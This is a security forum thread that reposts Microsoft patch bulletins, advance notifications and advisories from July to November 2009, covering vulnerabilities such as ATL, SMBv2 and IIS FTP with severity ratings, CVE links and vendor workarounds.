Release Date: 2009-07-28
Critical: Highly critical
Impact: System access
Where: From remote
Solution Status: Vendor Patch
Software: Microsoft Internet Explorer v5 - v8 ...
Solution: Apply patches...
Original Advisory: MS09-034 (KB972260):
http://www.microsoft.com/technet/security/Bulletin/MS09-034.mspx
Other References: Microsoft Security Advisory (KB973882):
http://www.microsoft.com/technet/security/advisory/973882.mspx ...

- http://secunia.com/advisories/35967/2/
Release Date: 2009-07-28
Critical: Moderately critical
Impact: System access, Exposure of sensitive information, Security Bypass
Where: From remote
Solution Status: Vendor Patch
Software: Microsoft Visual C++ (multiple versions), Microsoft Visual Studio (multiple versions)...
Original Advisory: MS09-035 (KB969706, KB971089, KB971090, KB971091, KB971092, KB973544, KB973551, KB973552, KB973830):
http://www.microsoft.com/technet/security/Bulletin/MS09-035.mspx ...

- http://www.sophos.com/blogs/sophoslabs/v/post/5627
July 28, 2009 - "...MS09-035 fixes the actual ATL code included with several versions of Microsoft Visual Studio so that the new ActiveX components compiled with the fixed ATL code are not affected by the incorrect pointer passing vulnerability in CComVariant::ReadFromStream function. Developers of ActiveX components that use ATL are advised to recompile and update their components using the fixed version of the Active Template Library...."

AplusWebMaster
2009-08-11, 20:41
FYI...

- http://www.microsoft.com/technet/security/Bulletin/MS09-aug.mspx
August 11, 2009 - "This bulletin summary lists security bulletins released for August 2009... (Total of -9-)

Critical -5-

Microsoft Security Bulletin MS09-043
Vulnerabilities in Microsoft Office Web Components Could Allow Remote Code Execution (957638)
- http://www.microsoft.com/technet/security/bulletin/ms09-043.mspx
Maximum Severity Rating: Critical
Vulnerability Impact: Remote Code Execution
Restart Requirement: May require restart
Affected Software: Microsoft Office, Microsoft Visual Studio, Microsoft ISA Server, Microsoft BizTalk Server...

Microsoft Security Bulletin MS09-044
Vulnerabilities in Remote Desktop Connection Could Allow Remote Code Execution (970927)
- http://www.microsoft.com/technet/security/bulletin/MS09-044.mspx
Maximum Severity Rating: Critical
Vulnerability Impact: Remote Code Execution
Restart Requirement: Requires restart
Affected Software: Microsoft Windows, Remote Desktop Connection Client for Mac...

Microsoft Security Bulletin MS09-039
Vulnerabilities in WINS Could Allow Remote Code Execution (969883)
- http://www.microsoft.com/technet/security/bulletin/MS09-039.mspx
Maximum Severity Rating: Critical
Vulnerability Impact: Remote Code Execution
Restart Requirement: Requires restart
Affected Software: Microsoft Windows...

Microsoft Security Bulletin MS09-038
Vulnerabilities in Windows Media File Processing Could Allow Remote Code Execution (971557)
- http://www.microsoft.com/technet/security/bulletin/MS09-038.mspx
Maximum Severity Rating: Critical
Vulnerability Impact: Remote Code Execution
Restart Requirement: Requires restart
Affected Software: Microsoft Windows...

Microsoft Security Bulletin MS09-037
Vulnerabilities in Microsoft Active Template Library (ATL) Could Allow Remote Code Execution (973908)
- http://www.microsoft.com/technet/security/bulletin/MS09-037.mspx
Maximum Severity Rating: Critical
Vulnerability Impact: Remote Code Execution
Restart Requirement: Requires restart
Affected Software: Microsoft Windows...

Important -4-

Microsoft Security Bulletin MS09-041
Vulnerability in Workstation Service Could Allow Elevation of Privilege (971657)
- http://www.microsoft.com/technet/security/bulletin/MS09-041.mspx
Maximum Severity Rating: Important
Vulnerability Impact: Elevation of Privilege
Restart Requirement: Requires restart
Affected Software: Microsoft Windows...

Microsoft Security Bulletin MS09-040
Vulnerability in Message Queuing Could Allow Elevation of Privilege (971032)
- http://www.microsoft.com/technet/security/bulletin/MS09-040.mspx
Maximum Severity Rating: Important
Vulnerability Impact: Elevation of Privilege
Restart Requirement: Requires restart
Affected Software: Microsoft Windows...

Microsoft Security Bulletin MS09-036
Vulnerability in ASP.NET in Microsoft Windows Could Allow Denial of Service (970957)
- http://www.microsoft.com/technet/security/bulletin/MS09-036.mspx
Maximum Severity Rating: Important
Vulnerability Impact: Denial of Service
Restart Requirement: Does not require restart
Affected Software: Microsoft Windows, Microsoft .NET Framework...

Microsoft Security Bulletin MS09-042
Vulnerability in Telnet Could Allow Remote Code Execution (960859)
- http://www.microsoft.com/technet/security/bulletin/MS09-042.mspx
Maximum Severity Rating: Important
Vulnerability Impact: Remote Code Execution
Restart Requirement: Requires restart
Affected Software: Microsoft Windows...
___

Severity and Exploitabilty Index (chart)
- http://blogs.technet.com/photos/msrcteam/images/3272462/original.aspx
___

ISC Analysis
- http://isc.sans.org/diary.html?storyid=6937
Last Updated: 2009-08-11 19:22:14 UTC
___

MSRT
- http://support.microsoft.com/?kbid=890830
Release Date: 8/11/2009
(Recent additions)
Win32/InternetAntivirus June 2009 (V 2.11) Moderate
Win32/FakeSpypro July 2009 (V 2.12) Moderate
Win32/FakeRean August 2009 (V 2.13) Moderate

AplusWebMaster
2009-08-12, 14:21
FYI...

Microsoft Security Advisory (973882)
Vulnerabilities in Microsoft Active Template Library (ATL) Could Allow Remote Code Execution
- http://www.microsoft.com/technet/security/advisory/973882.mspx
Published: July 28, 2009 | Updated: August 11, 2009 - "...Updates related to ATL:
- Updates released on August 11, 2009
• MS09-037 - Vulnerabilities in Microsoft Active Template Library (ATL) Could Allow Remote Code Execution
http://www.microsoft.com/technet/security/bulletin/ms09-037.mspx
• MS09-035 - Vulnerabilities in Visual Studio Active Template Library Could Allow Remote Code Execution
Published: July 28, 2009 | Updated: August 11, 2009
http://www.microsoft.com/technet/security/bulletin/ms09-035.mspx
- Updates released on July 28, 2009
• MS09-035 - Vulnerabilities in Visual Studio Active Template Library Could Allow Remote Code Execution
• MS09-034 - Cumulative Security Update for Internet Explorer
http://www.microsoft.com/technet/security/bulletin/ms09-034.mspx
- Update released on July 14, 2009
• MS09-032 - Cumulative Security Update of ActiveX Kill Bits
http://www.microsoft.com/technet/security/bulletin/ms09-032.mspx
___

Microsoft Security Advisory (973811)
Extended Protection for Authentication
- http://www.microsoft.com/technet/security/advisory/973811.mspx
Published: August 11, 2009 - "Microsoft is announcing the availability of a new feature, Extended Protection for Authentication, on the Windows platform. This feature enhances the protection and handling of credentials when authenticating network connections using Integrated Windows Authentication (IWA). The update itself does not directly provide protection against specific attacks such as credential forwarding, but allows applications to opt-in to Extended Protection for Authentication. This advisory briefs developers and system administrators on this new functionality and how it can be deployed to help protect authentication credentials... Apply the updates associated with security bulletin MS09-042...
http://www.microsoft.com/technet/security/bulletin/ms09-042.mspx

Microsoft Security Advisory (973472)
Vulnerability in Microsoft Office Web Components Control Could Allow Remote Code Execution
- http://www.microsoft.com/technet/security/advisory/973472.mspx
Published: July 13, 2009 | Updated: August 11, 2009 - "... We have issued MS09-043* to address this issue..."
* http://www.microsoft.com/technet/security/bulletin/ms09-043.mspx

.

AplusWebMaster
2009-08-18, 15:26
FYI...

- http://isc.sans.org/diary.html?storyid=6976
Last Updated: 2009-08-18 10:24:24 UTC - "... the MS09-039* vulnerability is actively exploited in the wild. To remind you, this vulnerability affects servers with the WINS service installed. The patch fixes two vulnerabilities. We do not have any technical information yet. However, the DShield graph shows a relatively high increase in targets for port 42 (see http://isc.sans.org/port.html?port=42 )... TCP port 42 is used for WINS replication..."
* http://www.microsoft.com/technet/security/bulletin/MS09-039.mspx

:fear::fear:

AplusWebMaster
2009-08-28, 00:59
FYI...

Microsoft Security Advisory (973882)
Vulnerabilities in Microsoft Active Template Library (ATL) Could Allow Remote Code Execution
- http://www.microsoft.com/technet/security/advisory/973882.mspx
• V3.0 (August 25, 2009): Advisory revised to provide details about the Windows Live Messenger* 14.0.8089 release and to communicate the removal of the Windows Live Hotmail "Attach Photo" feature.

* http://download.live.com/messenger

:fear:

AplusWebMaster
2009-08-29, 19:24
FYI...

MSRT August Top Detection Reports
- http://blogs.technet.com/mmpc/archive/2009/08/27/msrt-august-top-detection-reports.aspx
August 27, 2009

:fear:

AplusWebMaster
2009-08-31, 23:36
FYI...

Microsoft Security Advisory (967940)
Update for Windows Autorun
- http://www.microsoft.com/technet/security/advisory/967940.mspx
• V1.1 (August 25, 2009): Summary revised to notify users of an update to Autorun that restricts AutoPlay functionality to CD-ROM and DVD-ROM media, available for Windows XP, Windows Server 2003, Windows Vista, and Windows Server 2008 from Microsoft Knowledge Base Article 971029*.
* http://support.microsoft.com/kb/971029

:fear:

AplusWebMaster
2009-09-02, 05:36
FYI...

Microsoft Security Advisory (975191)
Vulnerability in Internet Information Services FTP Service Could Allow for Remote Code Execution
- http://www.microsoft.com/technet/security/advisory/975191.mspx
September 01, 2009 - "Microsoft is investigating new public reports of a vulnerability in the FTP Service in Microsoft Internet Information Services (IIS) 5.0, Microsoft Internet Information Services (IIS) 5.1, and Microsoft Internet Information Services (IIS) 6.0. The vulnerability could allow remote code execution on affected systems that are running the FTP service and are connected to the Internet. Microsoft is aware that detailed exploit code has been published on the Internet for this vulnerability. Microsoft is -not- currently aware of active attacks that use this exploit code or of customer impact at this time...
(See: )
Workarounds...
Additional Suggested Actions..."
* http://support.microsoft.com/kb/975191
September 2, 2009

> http://secunia.com/advisories/36443/2/
Release Date: 2009-09-01

- http://www.microsoft.com/technet/security/advisory/975191.mspx
"... Microsoft is currently aware of limited attacks that use this exploit code..."
Workarounds...
• Do not allow FTP write access to anonymous users...
• Do not allow FTP access to anonymous users...
• Modify NTFS file system permissions to disallow directory creation by FTP users...
• Upgrade to FTP Service 7.5 - FTP Service 7.5 is available for Windows Vista and Windows Server 2008. This version of FTP Service is not affected by the vulnerabilities in this advisory...
• Disable the FTP Service...
---
• V2.0 (September 3, 2009): Advisory revised to add CVE-2009-2521 and to provide more information on affected software, mitigations, and workarounds.

- http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2009-3023
Last revised: 09/04/2009
CVSS v2 Base Score: 9.0 (HIGH)

- http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2009-2521
Last revised: 09/04/2009

:fear:

AplusWebMaster
2009-09-04, 00:29
FYI...

- http://www.microsoft.com/technet/security/Bulletin/MS09-sep.mspx
September 03, 2009 - "This is an advance notification of security bulletins that Microsoft is intending to release on September 8, 2009... (Total of 5)

Critical -5-

Bulletin 1
Maximum Severity Rating: Critical
Vulnerability Impact: Remote Code Execution
Restart Requirement: May require restart
Vulnerability Impact: Microsoft Windows

Bulletin 2
Maximum Severity Rating: Critical
Vulnerability Impact: Remote Code Execution
Restart Requirement: Requires restart
Vulnerability Impact: Microsoft Windows

Bulletin 3
Maximum Severity Rating: Critical
Vulnerability Impact: Remote Code Execution
Restart Requirement: May require restart
Vulnerability Impact: Microsoft Windows

Bulletin 4
Maximum Severity Rating: Critical
Vulnerability Impact: Remote Code Execution
Restart Requirement: Requires restart
Vulnerability Impact: Microsoft Windows

Bulletin 5
Maximum Severity Rating: Critical
Vulnerability Impact: Remote Code Execution
Restart Requirement: May require restart
Vulnerability Impact: Microsoft Windows

AplusWebMaster
2009-09-08, 20:42
FYI...

- http://www.microsoft.com/technet/security/Bulletin/MS09-sep.mspx
September 08, 2009 - "This bulletin summary lists security bulletins released for September 2009... security bulletins for this month in order of severity... (Total of -5-)

Critical -5-

Microsoft Security Bulletin MS09-045
Vulnerability in JScript Scripting Engine Could Allow Remote Code Execution (971961)
- http://www.microsoft.com/technet/security/bulletin/MS09-045.mspx
Maximum Severity Rating: Critical
Vulnerability Impact: Remote Code Execution
Restart Requirement: May require restart
Affected Software: Microsoft Windows

Microsoft Security Bulletin MS09-049
Vulnerability in Wireless LAN AutoConfig Service Could Allow Remote Code Execution (970710)
- http://www.microsoft.com/technet/security/bulletin/MS09-049.mspx
Maximum Severity Rating: Critical
Vulnerability Impact: Remote Code Execution
Restart Requirement: Requires restart
Affected Software: Microsoft Windows

Microsoft Security Bulletin MS09-047
Vulnerabilities in Windows Media Format Could Allow Remote Code Execution (973812)
- http://www.microsoft.com/technet/security/bulletin/MS09-047.mspx
Maximum Severity Rating: Critical
Vulnerability Impact: Remote Code Execution
Restart Requirement: May require restart
Affected Software: Microsoft Windows

Microsoft Security Bulletin MS09-048
Vulnerabilities in Windows TCP/IP Could Allow Remote Code Execution (967723)
- http://www.microsoft.com/technet/security/bulletin/MS09-048.mspx
Maximum Severity Rating: Critical
Vulnerability Impact: Remote Code Execution
Restart Requirement: Requires restart
Affected Software: Microsoft Windows

Microsoft Security Bulletin MS09-046
Vulnerability in DHTML Editing Component ActiveX Control Could Allow Remote Code Execution (956844)
- http://www.microsoft.com/technet/security/bulletin/MS09-046.mspx
Maximum Severity Rating: Critical
Vulnerability Impact: Remote Code Execution
Restart Requirement: May require restart
Affected Software: Microsoft Windows
___

MS09-045 - http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2009-1920
MS09-046 - http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2009-2519
MS09-047 - http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2009-2498
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2009-2499
MS09-048 - http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2008-4609
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2009-1925
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2009-1926
MS09-049 - http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2009-1132
___

ISC Analysis
- http://isc.sans.org/diary.html?storyid=7099
Last Updated: 2009-09-08 19:14:07 UTC
___

MS Severity and Exploitability Index
- http://blogs.technet.com/photos/msrcteam/images/3279846/original.aspx

MS Deployment Prioritization Assessment
- http://blogs.technet.com/photos/msrcteam/images/3279847/original.aspx

.

AplusWebMaster
2009-09-09, 05:41
FYI...

Vista/2008/Windows7 SMB2 BSOD 0-Day
- http://isc.sans.org/diary.html?storyid=7093
Last Updated: 2009-09-08 13:09:06 UTC - "... vulnerability affecting Microsoft SMB2* can be remotely crashed with proof-of-concept code that has been published yesterday and a Metasploit module is out. We have confirmed it affects Windows 7/Vista/Server 2008. The exploit needs no authentication, only file sharing enabled with one 1 packet to create a BSOD. We recommend filtering access to port TCP 445 with a firewall. Windows 2000/XP are NOT affected by this exploit..."
* http://en.wikipedia.org/wiki/Server_Message_Block#SMB2
___

Microsoft Security Advisory (975497)
Vulnerabilities in SMB Could Allow Remote Code Execution
- http://www.microsoft.com/technet/security/advisory/975497.mspx
September 08, 2009 - "Microsoft is investigating new public reports of a possible vulnerability in Microsoft Server Message Block (SMB) implementation. We are not aware of attacks that try to use the reported vulnerabilities or of customer impact at this time... Upon completion of this investigation, Microsoft will take the appropriate action to help protect our customers. This may include providing a security update through our monthly release process or providing an out-of-cycle security update, depending on customer needs...
Workarounds...
• Disable SMB v2... modify the registry key...
• Block TCP ports 139 and 445 at the firewall..."

- http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2009-3103
Last revised: 09/09/2009

- http://www.symantec.com/connect/blogs/bsod-and-possibly-more
September 15, 2009

:fear:

AplusWebMaster
2009-09-17, 12:41
FYI...

SMB2 remote exploit released
- http://isc.sans.org/diary.html?storyid=7141
Last Updated: 2009-09-16 21:15:36 UTC - "... 0-day vulnerability in SMB2 on Windows Vista and Server 2008 operating systems... Yesterday a well known security company added a module for their exploitation product. The module contains the remote exploit for this vulnerability – in other words, any user running this tool can get full access to affected machines. If the exploit is stable enough, it can _very easily_ be used in a worm, so it can potentially be devastating. So, if you are running a Windows Vista or Server 2008 machine (Windows 7 RTM is not affected, RC *is*), be sure you apply one of workarounds listed by Microsoft (they are not perfect, but they can help), available here*..."
* http://www.microsoft.com/technet/security/advisory/975497.mspx

- http://www.theregister.co.uk/2009/09/16/windows_vista_exploit_released/
16 September 2009

:fear::mad::fear:

AplusWebMaster
2009-09-18, 01:18
FYI...

Microsoft Security Advisory (975497)
Vulnerabilities in SMB Could Allow Remote Code Execution
- http://www.microsoft.com/technet/security/advisory/975497.mspx
Updated: September 17, 2009 - "...Workarounds:
• Disable SMB v2... See Microsoft Knowledge Base Article 975497* to use the automated Microsoft Fix it solution to enable or disable this workaround...
* http://support.microsoft.com/kb/975497

• V1.1 (September 17, 2009): Clarified the FAQ, What is SMBv2? Added a link to Microsoft Knowledge Base Article 975497 to provide an automated Microsoft Fix it solution* for the workaround, Disable SMB v2...

- http://blogs.technet.com/srd/archive/2009/09/18/update-on-the-smb-vulnerability.aspx
September 18, 2009

:fear:

AplusWebMaster
2009-09-24, 00:47
FYI...

Microsoft Security Advisory (975497)
Vulnerabilities in SMB Could Allow Remote Code Execution
- http://www.microsoft.com/technet/security/advisory/975497.mspx
• V1.2 (September 23, 2009): Clarified the FAQ, What is Server Message Block Version 2 (SMBv2)? Also clarified the impact of the workaround, Disable SMB v2.
(See: "Workarounds... Impact of Workaround...")
"... Some of the applications or services that could be impacted are listed..."

:fear:

AplusWebMaster
2009-09-29, 15:53
FYI...

Metasploit exploit module released
- http://www.symantec.com/security_response/threatconlearn.jsp
"... tracking a remotely exploitable vulnerability affecting the SMB kernel component ('srv2.sys'). Microsoft has reported that Windows Vista (SP1 and SP2) and Windows Server 2008 are affected. Reportedly, some beta builds of Windows 7 may also be affected.

On September 28, 2009, a remote code-execution exploit Metasploit module was released publicly. Attackers may be able to convert this module into other exploits and use it in the wild. We strongly advise users to block TCP port 445 immediately until patches are available. The researcher who discovered the flaw has stated that file sharing must be enabled for the issue to be exploit. Unless file sharing is explicitly required, users should disable it..."

:fear:

AplusWebMaster
2009-10-09, 00:20
FYI...

- http://www.theregister.co.uk/2009/10/09/patch_tues_oct_pre_alert/
9 October 2009 - "... biggest ever Patch Tuesday update... 13 bulletins collectively address 34 security flaws..."

- http://www.microsoft.com/technet/security/Bulletin/MS09-oct.mspx
October 8, 2009 - "This is an advance notification of security bulletins that Microsoft is intending to release on October 13, 2009... (Total of -13-)

Critical -8-

Bulletin 1
Maximum Severity Rating: Critical
Vulnerability Impact: Remote Code Execution
Restart Requirement: Requires restart
Vulnerability Impact: Microsoft Windows

Bulletin 2
Maximum Severity Rating: Critical
Vulnerability Impact: Remote Code Execution
Restart Requirement: May require restart
Vulnerability Impact: Microsoft Windows

Bulletin 3
Maximum Severity Rating: Critical
Vulnerability Impact: Remote Code Execution
Restart Requirement: May require restart
Vulnerability Impact: Microsoft Windows

Bulletin 5
Maximum Severity Rating: Critical
Vulnerability Impact: Remote Code Execution
Restart Requirement: Requires restart
Vulnerability Impact: Microsoft Windows, Internet Explorer

Bulletin 6
Maximum Severity Rating: Critical
Vulnerability Impact: Remote Code Execution
Restart Requirement: May require restart
Vulnerability Impact: Microsoft Windows

Bulletin 11
Maximum Severity Rating: Critical
Vulnerability Impact: Remote Code Execution
Restart Requirement: May require restart
Vulnerability Impact: Microsoft Office

Bulletin 12
Maximum Severity Rating: Critical
Vulnerability Impact: Remote Code Execution
Restart Requirement: May require restart
Vulnerability Impact: Microsoft Windows, Microsoft Silverlight

Bulletin 13
Maximum Severity Rating: Critical
Vulnerability Impact: Remote Code Execution
Restart Requirement: May require restart
Vulnerability Impact: Microsoft Windows, Microsoft Office, Microsoft SQL Server, Microsoft Developer Tools, Microsoft Forefront

Important -5-

Bulletin 4
Maximum Severity Rating: Important
Vulnerability Impact: Remote Code Execution
Restart Requirement: May require restart
Vulnerability Impact: Microsoft Windows

Bulletin 7
Maximum Severity Rating: Important
Vulnerability Impact: Spoofing
Restart Requirement: Requires restart
Vulnerability Impact: Microsoft Windows

Bulletin 8
Maximum Severity Rating: Important
Vulnerability Impact: Remote Code Execution
Restart Requirement: May require restart
Vulnerability Impact: Microsoft Windows

Bulletin 9
Maximum Severity Rating: Important
Vulnerability Impact: Elevation of Privilege
Restart Requirement: May require restart
Vulnerability Impact: Microsoft Windows

Bulletin 10
Maximum Severity Rating: Important
Vulnerability Impact: Denial of Service
Restart Requirement: May require restart
Vulnerability Impact: Microsoft Windows
___

October 2009 Bulletin Release Advance Notification
- http://blogs.technet.com/msrc/archive/2009/10/08/october-2009-bulletin-release.aspx
October 08, 2009 - "... Among the updates this month, we are closing out two current security advisories:
• Vulnerabilities in SMB Could Allow Remote Code Execution (975497)
http://www.microsoft.com/technet/security/advisory/975497.mspx
• Vulnerabilities in the FTP Service in Internet Information Services (975191)
http://www.microsoft.com/technet/security/advisory/975191.mspx
Usually we do not go into this level of detail in the advance notification but we felt that it is important guidance so customers can plan accordingly and deploy these updates as soon as possible..."

.

AplusWebMaster
2009-10-13, 20:42
FYI...

- http://www.microsoft.com/technet/security/Bulletin/MS09-oct.mspx
October 13, 2009 - "This bulletin summary lists security bulletins released for October 2009...
(Total of -13-)

Critical -8-

Microsoft Security Bulletin MS09-050
Vulnerabilities in SMBv2 Could Allow Remote Code Execution (975517)
- http://www.microsoft.com/technet/security/bulletin/ms09-050.mspx
Maximum Severity Rating: Critical
Vulnerability Impact: Remote Code Execution
Restart Requirement: Requires restart
Affected Software: Microsoft Windows

Microsoft Security Bulletin MS09-051
Vulnerabilities in Windows Media Runtime Could Allow Remote Code Execution (975682)
- http://www.microsoft.com/technet/security/bulletin/ms09-051.mspx
Maximum Severity Rating: Critical
Vulnerability Impact: Remote Code Execution
Restart Requirement: May require restart
Affected Software: Microsoft Windows

Microsoft Security Bulletin MS09-052
Vulnerability in Windows Media Player Could Allow Remote Code Execution (974112)
- http://www.microsoft.com/technet/security/bulletin/ms09-052.mspx
Maximum Severity Rating: Critical
Vulnerability Impact: Remote Code Execution
Restart Requirement: May require restart
Affected Software: Microsoft Windows

Microsoft Security Bulletin MS09-054
Cumulative Security Update for Internet Explorer (974455)
- http://www.microsoft.com/technet/security/bulletin/ms09-054.mspx
Maximum Severity Rating: Critical
Vulnerability Impact: Remote Code Execution
Restart Requirement: Requires restart
Affected Software: Microsoft Windows

Microsoft Security Bulletin MS09-055
Cumulative Security Update of ActiveX Kill Bits (973525)
- http://www.microsoft.com/technet/security/bulletin/ms09-055.mspx
Maximum Severity Rating: Critical
Vulnerability Impact: Remote Code Execution
Restart Requirement: May require restart
Affected Software: Microsoft Windows

Microsoft Security Bulletin MS09-060
Vulnerabilities in Microsoft Active Template Library (ATL) ActiveX Controls for Microsoft Office Could Allow Remote Code Execution (973965)
- http://www.microsoft.com/technet/security/bulletin/ms09-060.mspx
Maximum Severity Rating: Critical
Vulnerability Impact: Remote Code Execution
Restart Requirement: May require restart
Affected Software: Microsoft Office

Microsoft Security Bulletin MS09-061
Vulnerabilities in the Microsoft .NET Common Language Runtime Could Allow Remote Code Execution (974378)
- http://www.microsoft.com/technet/security/bulletin/ms09-061.mspx
Maximum Severity Rating: Critical
Vulnerability Impact: Remote Code Execution
Restart Requirement: May require restart
Affected Software: Microsoft Windows, Microsoft .NET Framework, Microsoft Silverlight

Microsoft Security Bulletin MS09-062
Vulnerabilities in GDI+ Could Allow Remote Code Execution (957488)
- http://www.microsoft.com/technet/security/bulletin/ms09-062.mspx
Maximum Severity Rating: Critical
Vulnerability Impact: Remote Code Execution
Restart Requirement: May require restart
Affected Software: Microsoft Windows, Internet Explorer, Microsoft .NET Framework, Microsoft Office, Microsoft SQL Server, Microsoft Developer Tools, Microsoft Forefront

Important -5-

Microsoft Security Bulletin MS09-053
Vulnerabilities in FTP Service for Internet Information Services Could Allow Remote Code Execution (975254)
- http://www.microsoft.com/technet/security/bulletin/ms09-053.mspx
Maximum Severity Rating: Important
Vulnerability Impact: Remote Code Execution
Restart Requirement: May require restart
Affected Software: Microsoft Windows

Microsoft Security Bulletin MS09-056
Vulnerabilities in Windows CryptoAPI Could Allow Spoofing (974571)
- http://www.microsoft.com/technet/security/bulletin/ms09-056.mspx
Maximum Severity Rating: Important
Vulnerability Impact: Spoofing
Restart Requirement: Requires restart
Affected Software: Microsoft Windows

Microsoft Security Bulletin MS09-057
Vulnerability in Indexing Service Could Allow Remote Code Execution (969059)
- http://www.microsoft.com/technet/security/bulletin/ms09-057.mspx
Maximum Severity Rating: Important
Vulnerability Impact: Remote Code Execution
Restart Requirement: Requires restart
Affected Software: Microsoft Windows

Microsoft Security Bulletin MS09-058
Vulnerabilities in Windows Kernel Could Allow Elevation of Privilege (971486)
- http://www.microsoft.com/technet/security/bulletin/ms09-058.mspx
Maximum Severity Rating: Important
Vulnerability Impact: Elevation of Privilege
Restart Requirement: Requires restart
Affected Software: Microsoft Windows

Microsoft Security Bulletin MS09-059
Vulnerability in Local Security Authority Subsystem Service Could Allow Denial of Service (975467)
- http://www.microsoft.com/technet/security/bulletin/ms09-059.mspx
Maximum Severity Rating: Important
Vulnerability Impact: Denial of Service
Restart Requirement: Requires restart
Affected Software: Microsoft Windows
___

ISC Analysis
- http://isc.sans.org/diary.html?storyid=7345
Last Updated: 2009-10-13 21:08:21 UTC
___

Severity summary and exploitability index
- http://blogs.technet.com/photos/msrcteam/images/3286577/original.aspx
October 13, 2009

Deployment priority
- http://blogs.technet.com/photos/msrcteam/images/3286578/original.aspx
October 13, 2009
___

MSRT
- http://support.microsoft.com/?kbid=890830
October 13, 2009 - Revision: 65.0
(Recent additions)
Win32/FakeRean August 2009 (V 2.13) Moderate
Win32/Bredolab September 2009 (V 2.14) Moderate
Win32/Daurso September 2009 (V 2.14) Moderate
Win32/FakeScanti October 2009 (V 3.0) Moderate
- http://www.microsoft.com/security/malwareremove/families.aspx

//

AplusWebMaster
2009-10-14, 13:30
FYI...

Microsoft Security Advisory (973882)
Vulnerabilities in Microsoft Active Template Library (ATL) Could Allow Remote Code Execution
- http://www.microsoft.com/technet/security/advisory/973882.mspx
• V4.0 (October 13, 2009): Advisory revised to add an entry in the Updates related to ATL section to communicate the release of Microsoft Security Bulletin MS09-060, "Vulnerabilities in Microsoft Active Template Library (ATL) ActiveX Controls for Microsoft Office Could Allow Remote Code Execution."
- http://www.microsoft.com/technet/security/bulletin/ms09-060.mspx

Microsoft Security Advisory (975191)
Vulnerabilities in the FTP Service in Internet Information Services
- http://www.microsoft.com/technet/security/advisory/975191.mspx
• V3.0 (October 13, 2009): Advisory updated to reflect publication of security bulletin (MS09-053).
- http://www.microsoft.com/technet/security/bulletin/ms09-053.mspx

Microsoft Security Advisory (975497)
Vulnerabilities in SMB Could Allow Remote Code Execution
- http://www.microsoft.com/technet/security/advisory/975497.mspx
• V2.0 (October 13, 2009): Advisory updated to reflect publication of security bulletin (MS09-050).
- http://www.microsoft.com/technet/security/bulletin/ms09-050.mspx

:fear:

AplusWebMaster
2009-10-14, 14:22
FYI...

Do NOT Apply MS09-056/KB974571 to LCS/OCS Servers
- http://blogs.technet.com/dodeitte/archive/2009/10/13/do-not-apply-kb974571-to-lcs-ocs-servers.aspx
October 13, 2009 11:04 PM - "Currently an issue is being observed after applying KB974571 (MS09-056: Vulnerabilities in CryptoAPI could allow spoofing) to LCS/OCS servers, that is causing them to believe that they are running an evaluation version of LCS/OCS and that it has expired..."
- http://support.microsoft.com/kb/974571/

:fear::fear:

AplusWebMaster
2009-10-16, 05:15
FYI...

Microsoft Security Advisory (973811)
Extended Protection for Authentication
- http://www.microsoft.com/technet/security/advisory/973811.mspx
Updated: October 14, 2009 - "... Microsoft Security Bulletin MS09-054 contains a defense-in-depth, non-security update that enables WinINET to opt in to Extended Protection for Authentication.
• V1.1 (October 14, 2009): Updated the FAQ with information about a non-security update included in MS09-054* relating to WinINET.
* http://www.microsoft.com/technet/security/bulletin/ms09-054.mspx

:spider:

AplusWebMaster
2009-11-03, 14:48
FYI...

Update released for MS09-054
- http://blogs.technet.com/msrc/archive/2009/11/02/update-released-for-ms09-054.aspx
November 02, 2009 - "Today we released an update 976749 that addresses two issues with MS09-054 that a limited number customers reported to us through our Customer Service and Support (CSS) group. These two issues can affect the proper display of web pages. For additional details, please refer to Microsoft Knowledge Base article 976749*. Security update MS09-054 was released as part of the October Security Bulletin Release cycle and protects against the vulnerabilities outlined in the bulletin. Also, we’re not currently aware of any attempts to attack the vulnerabilities. While the number of customers affected by these two issues is limited, after working both with affected customers and our CSS group, we feel the best thing for all customers is to proactively provide this update as widely as possible to help prevent other customers from encountering the issues outlined in the KB. Because of this, we plan to release this update through the same broad release channels as the original security update, MS09-054. Customers will see 976749 offered by default through Windows Update, Microsoft Update, and Automatic Updates. Customers who have applied MS09-054 should go ahead and apply 976749. Customers who have not yet applied MS09-054 should apply -both- MS09-054 and 976749..."
* http://support.microsoft.com/kb/976749
November 3, 2009 - Revision: 5.0 - "...Important: Do not install this update if you have not installed security update 974455. If you install this update without first installing security update 974455, Internet Explorer may not work correctly. If this occurs, uninstall this update, install security update 974455, and then reinstall this update..."

- http://www.microsoft.com/technet/security/bulletin/ms09-054.mspx
• V2.0 (November 2, 2009): Revised to announce the availability of a hotfix to address application compatibility issues. Customers who have already applied this update may install the hotfix from Microsoft Knowledge Base Article 976749. Also corrected the log file names, spuninst folder names, and registry key values for Microsoft Windows 2000.

- http://secunia.com/advisories/36979/2/
Critical: Highly critical
2009-11-03: Updated "Solution" section as Microsoft issues an update to address certain problems introduced by the original patches. Added link in "Original Advisory" section.

:fear:

AplusWebMaster
2009-11-06, 07:18
FYI...

- http://www.microsoft.com/technet/security/bulletin/ms09-nov.mspx
November 05, 2009 - "This is an advance notification of security bulletins that Microsoft is intending to release on November 10, 2009..."
(Total of -6-)

Critical -3-

Bulletin 1
Maximum Severity Rating: Critical
Vulnerability Impact: Remote Code Execution
Restart Requirement: Requires restart
Vulnerability Impact: Microsoft Windows

Bulletin 2
Maximum Severity Rating: Critical
Vulnerability Impact: Remote Code Execution
Restart Requirement: Requires restart
Vulnerability Impact: Microsoft Windows

Bulletin 3
Maximum Severity Rating: Critical
Vulnerability Impact: Remote Code Execution
Restart Requirement: Requires restart
Vulnerability Impact: Microsoft Windows

Important -3-

Bulletin 4
Maximum Severity Rating: Important
Vulnerability Impact: Denial of Service
Restart Requirement: Requires restart
Vulnerability Impact: Microsoft Windows

Bulletin 5
Maximum Severity Rating: Important
Vulnerability Impact: Remote Code Execution
Restart Requirement: May require restart
Vulnerability Impact: Microsoft Office

Bulletin 6
Maximum Severity Rating: Important
